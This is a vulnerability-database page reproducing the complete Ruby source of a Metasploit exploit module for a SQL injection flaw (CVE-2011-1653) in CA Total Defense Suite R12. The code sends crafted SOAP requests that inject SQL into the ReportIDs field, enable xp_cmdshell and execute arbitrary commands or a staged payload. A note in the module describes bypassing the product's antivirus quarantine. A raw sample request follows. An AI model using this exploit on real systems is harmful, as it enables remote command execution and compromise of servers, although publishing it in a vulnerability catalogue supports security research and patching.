Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 11 Views

CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection. Exploits SQL injection flaw in CA Total Defense Suite R12. Abuses reGenerateReports stored procedure to inject arbitrary SQL statements. Tested against MS SQL Server 2005 Express. Bypasses quarantine with alternate executable template

Code

                                                ##
# $Id: ca_totaldefense_regeneratereports.rb 13810 2011-10-02 17:03:23Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',
			'Description'    => %q{
					This module exploits an sql injection flaw in CA Total Defense Suite R12.
				When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an
				attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql
				statements into the ReportIDs element. 

				NOTE: This module was tested against the MS SQL Server 2005 Express that's bundled with
				CA Total Defense Suite R12. CA's Total Defense Suite real-time protection
				will quarantine the default framework executable payload. Choosing an alternate
				exe template will bypass the quarantine.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13810 $',
			'References'     =>
				[
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ],
					[ 'OSVDB', '74968'],
					[ 'CVE', '2011-1653' ],
				],
			'Targets'	=>
				[
					[ 'Windows Universal', 
						{ 
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						} 
					]
				],
			'Privileged' => true,
			'Platform' => 'win',
			'DisclosureDate' => 'Apr 13 2011',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(34443),
				OptBool.new('SSL',   [ true, 'Use SSL', true ]),
				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
			], self.class)
	end

	def windows_stager

		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
		
		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
		execute_cmdstager({ :temp => '.'})
		@payload_exe = payload_exe
		
		print_status("Attempting to execute the payload...")
		execute_command(@payload_exe)
	
	end

	def execute_command(cmd, opts = {})

		inject = [
				"'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",
				"'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",
				"'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",
			]
			
		inject.each do |sqli|

		soap = %Q|<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
	<soap12:Body>
		<reGenerateReports xmlns="http://tempuri.org/">
			<EnterpriseID>msf</EnterpriseID>
			<ReportIDs>#{sqli}</ReportIDs>
			<UserID>187</UserID>
		</reGenerateReports>
	</soap12:Body>
</soap12:Envelope>
		|

		res = send_request_cgi(
			{
				'uri'   =>  '/UNCWS/Management.asmx',
				'method' => 'POST',
				'version' => '1.0',
				'ctype' => 'application/soap+xml; charset=utf-8',
				'data' => soap,
			}, 5)
		
		if ( res and res.body =~ /SUCCESS/ )
				#print_good("Executing command...")
			else
				raise RuntimeError, 'Something went wrong.'
			end
		end

	end

	def exploit

		if not datastore['CMD'].empty?
			print_status("Executing command '#{datastore['CMD']}'")
			execute_command(datastore['CMD'])
			return
		end

		case target['Platform']
			when 'win'
				windows_stager
			else
				raise RuntimeError, 'Target not supported.'
		end

		handler

	end
end
__END__
POST /UNCWS/Management.asmx HTTP/1.1
Host: 192.168.31.129
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
	<soap12:Body>
		<reGenerateReports xmlns="http://tempuri.org/">
			<EnterpriseID>string</EnterpriseID>
			<ReportIDs>string</ReportIDs>		<--boom!!
			<UserID>long</UserID>
		</reGenerateReports>
	</soap12:Body>
</soap12:Envelope>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
ca total defense suitesql injectionr12ms sql serverarbitrary sqlquarantine bypass
11